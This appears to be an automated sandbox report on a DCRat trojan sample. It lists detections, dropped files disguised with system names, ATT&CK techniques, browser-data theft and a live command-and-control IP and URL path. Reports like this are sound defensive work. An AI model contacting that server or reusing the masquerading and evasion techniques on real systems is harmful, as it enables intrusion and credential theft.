                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49354fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49364fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Providerbroker.exe.450000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2080050228.00000000048E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2080638886.00000000048E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2131916065.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\PrintDialog\pris\spoolsv.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\providerBrowserruntimeCrt\Providerbroker.exe, type: DROPPED
                                    Source: Yara matchFile source: 9FwQYJSj4N.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49354fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49364fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Providerbroker.exe.450000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\PrintDialog\pris\spoolsv.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\providerBrowserruntimeCrt\Providerbroker.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts141
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    DLL Side-Loading
                                    1
                                    Disable or Modify Tools
                                    1
                                    OS Credential Dumping
                                    1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API
                                    1
                                    DLL Side-Loading
                                    12
                                    Process Injection
                                    1
                                    Deobfuscate/Decode Files or Information
                                    LSASS Memory3
                                    File and Directory Discovery
                                    Remote Desktop Protocol1
                                    Data from Local System
                                    1
                                    Non-Application Layer Protocol
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter
                                    Logon Script (Windows)Logon Script (Windows)3
                                    Obfuscated Files or Information
                                    Security Account Manager157
                                    System Information Discovery
                                    SMB/Windows Admin Shares1
                                    Clipboard Data
                                    11
                                    Application Layer Protocol
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                                    Software Packing
                                    NTDS361
                                    Security Software Discovery
                                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading
                                    LSA Secrets2
                                    Process Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts133
                                    Masquerading
                                    Cached Domain Credentials261
                                    Virtualization/Sandbox Evasion
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                                    Virtualization/Sandbox Evasion
                                    DCSync1
                                    Application Window Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                                    Process Injection
                                    Proc Filesystem1
                                    Remote System Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                                    System Network Configuration Discovery
                                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579262 Sample: 9FwQYJSj4N.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Antivirus detection for dropped file 2->62 64 11 other signatures 2->64 10 9FwQYJSj4N.exe 3 6 2->10         started        process3 file4 46 C:\...\Providerbroker.exe, PE32 10->46 dropped 13 wscript.exe 1 10->13         started        process5 signatures6 76 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->76 16 cmd.exe 1 13->16         started        process7 process8 18 Providerbroker.exe 3 43 16->18         started        22 conhost.exe 16->22         started        file9 38 C:\...\BSlvAOjamepaXWJMhY.exe, PE32 18->38 dropped 40 C:\Windows\PrintDialog\pris\spoolsv.exe, PE32 18->40 dropped 42 C:\Users\user\Desktop\zOoquaSY.log, PE32 18->42 dropped 44 30 other malicious files 18->44 dropped 66 Multi AV Scanner detection for dropped file 18->66 68 Detected unpacking (creates a PE file in dynamic memory) 18->68 70 Drops PE files with benign system names 18->70 24 cmd.exe 1 18->24         started        signatures10 process11 signatures12 72 Uses ping.exe to sleep 24->72 74 Uses ping.exe to check the status of other devices and networks 24->74 27 BSlvAOjamepaXWJMhY.exe 14 284 24->27         started        32 conhost.exe 24->32         started        34 PING.EXE 1 24->34         started        36 chcp.com 1 24->36         started        process13 dnsIp14 56 89.23.96.180, 49734, 49741, 49744 MAXITEL-ASRU Russian Federation 27->56 48 C:\Users\user\Desktop\zsYipEjs.log, PE32 27->48 dropped 50 C:\Users\user\Desktop\yEUaDqnu.log, PE32 27->50 dropped 52 C:\Users\user\Desktop\wHtSiqYz.log, PE32 27->52 dropped 54 24 other malicious files 27->54 dropped 78 Multi AV Scanner detection for dropped file 27->78 80 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 27->80 82 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 27->82 84 Tries to harvest and steal browser information (history, passwords, etc) 27->84 file15 signatures16

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    9FwQYJSj4N.exe60%VirustotalBrowse
                                    9FwQYJSj4N.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    9FwQYJSj4N.exe100%AviraVBS/Runner.VPG
                                    9FwQYJSj4N.exe100%Joe Sandbox ML
                                    SourceDetectionScannerLabelLink
                                    C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\user\Desktop\BqwHRBKU.log100%AviraHEUR/AGEN.1300079
                                    C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\user\Desktop\RRtweJUq.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\NsJXliNz.log100%AviraHEUR/AGEN.1362695
                                    C:\Users\user\Desktop\BmbzgENi.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\Desktop\GidQnkDb.log100%AviraTR/AD.BitpyRansom.lcksd
                                    C:\Users\user\Desktop\QURoIJFv.log100%AviraTR/AVI.Agent.updqb
                                    C:\Recovery\ApplicationFrameHost.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\user\Desktop\HrJyYQpO.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\NJzXBuON.log100%Joe Sandbox ML
                                    C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\BqwHRBKU.log100%Joe Sandbox ML
                                    C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\VIjnlGUj.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\AtVzwBvZ.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\RRtweJUq.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\NsJXliNz.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\BmbzgENi.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\HjZguhPI.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\HAgyIDIK.log100%Joe Sandbox ML
                                    C:\Recovery\ApplicationFrameHost.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\VMyxesyD.log100%Joe Sandbox ML
                                    C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\ApplicationFrameHost.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\AtVzwBvZ.log16%ReversingLabs
                                    C:\Users\user\Desktop\BmbzgENi.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\BqwHRBKU.log4%ReversingLabs
                                    C:\Users\user\Desktop\CEfhBXTR.log8%ReversingLabs
                                    C:\Users\user\Desktop\DCGpXXhM.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\FkBISkog.log3%ReversingLabs
                                    C:\Users\user\Desktop\GidQnkDb.log33%ReversingLabsWin32.Ransomware.Bitpy
                                    C:\Users\user\Desktop\HAgyIDIK.log5%ReversingLabs
                                    C:\Users\user\Desktop\HjZguhPI.log8%ReversingLabs
                                    C:\Users\user\Desktop\HrJyYQpO.log8%ReversingLabs
                                    C:\Users\user\Desktop\IZCgKuwL.log21%ReversingLabs
                                    C:\Users\user\Desktop\JXdofuLG.log25%ReversingLabs
                                    C:\Users\user\Desktop\JkPyJTHW.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\KYTGugDU.log25%ReversingLabs
                                    C:\Users\user\Desktop\LVvPQgSP.log8%ReversingLabs
                                    C:\Users\user\Desktop\MebxBNFC.log3%ReversingLabs
                                    C:\Users\user\Desktop\NJzXBuON.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\NkZFHznt.log17%ReversingLabs
                                    C:\Users\user\Desktop\NsJXliNz.log17%ReversingLabs
                                    C:\Users\user\Desktop\QURoIJFv.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\QzpNJrOH.log12%ReversingLabs
                                    C:\Users\user\Desktop\RRtweJUq.log17%ReversingLabs
                                    C:\Users\user\Desktop\RbQwOwnn.log8%ReversingLabs
                                    C:\Users\user\Desktop\STjOtvME.log17%ReversingLabs
                                    C:\Users\user\Desktop\VIjnlGUj.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\VMyxesyD.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\VWRNVcdg.log33%ReversingLabsWin32.Ransomware.Bitpy
                                    C:\Users\user\Desktop\WJZFAsNx.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\WsSnlWTv.log9%ReversingLabs
                                    C:\Users\user\Desktop\YYEvrLib.log29%ReversingLabs
                                    C:\Users\user\Desktop\YuFVHGXq.log21%ReversingLabs
                                    C:\Users\user\Desktop\bnUEsCJp.log16%ReversingLabs
                                    C:\Users\user\Desktop\dpGmOlNk.log8%ReversingLabs
                                    C:\Users\user\Desktop\fneLqjpL.log25%ReversingLabs
                                    C:\Users\user\Desktop\fwOdVSPR.log9%ReversingLabs
                                    C:\Users\user\Desktop\gCMlaExJ.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\hgxdViOd.log25%ReversingLabs
                                    C:\Users\user\Desktop\ihttcfaK.log12%ReversingLabs
                                    C:\Users\user\Desktop\jaztMisT.log29%ReversingLabs
                                    C:\Users\user\Desktop\ksDciByC.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\lWnUcfOW.log25%ReversingLabs
                                    C:\Users\user\Desktop\lkWuMAXT.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\oVBKTOiM.log8%ReversingLabs
                                    C:\Users\user\Desktop\oitSpyyv.log21%ReversingLabs
                                    C:\Users\user\Desktop\rOQtFLTL.log8%ReversingLabs
                                    C:\Users\user\Desktop\rxJbrpZI.log21%ReversingLabs
                                    C:\Users\user\Desktop\tRDbbuYG.log5%ReversingLabs
                                    C:\Users\user\Desktop\uwXRiYty.log17%ReversingLabs
                                    C:\Users\user\Desktop\wDeIoEvg.log25%ReversingLabs
                                    C:\Users\user\Desktop\wHtSiqYz.log4%ReversingLabs
                                    C:\Users\user\Desktop\yEUaDqnu.log17%ReversingLabs
                                    C:\Users\user\Desktop\zFRrKozb.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\zOoquaSY.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\zsYipEjs.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\PrintDialog\pris\spoolsv.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\providerBrowserruntimeCrt\Providerbroker.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
                                    No Antivirus matches
                                    No contacted domains info
                                    NameMaliciousAntivirus DetectionReputation
                                    http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.phptrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabBSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                          high
                                          https://duckduckgo.com/ac/?q=BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoBSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                              high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                                  high
                                                  http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/LowlonBSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmptrue
                                                    unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                                      high
                                                      http://89.23.96.180BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmptrue
                                                        unknown
                                                        https://www.ecosia.org/newtab/BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameProviderbroker.exe, 00000005.00000002.2199739543.000000000331A000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              89.23.96.180
                                                              unknownRussian Federation
                                                              48687MAXITEL-ASRUtrue
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1579262
                                                              Start date and time:2024-12-21 10:01:10 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 9m 3s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:16
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
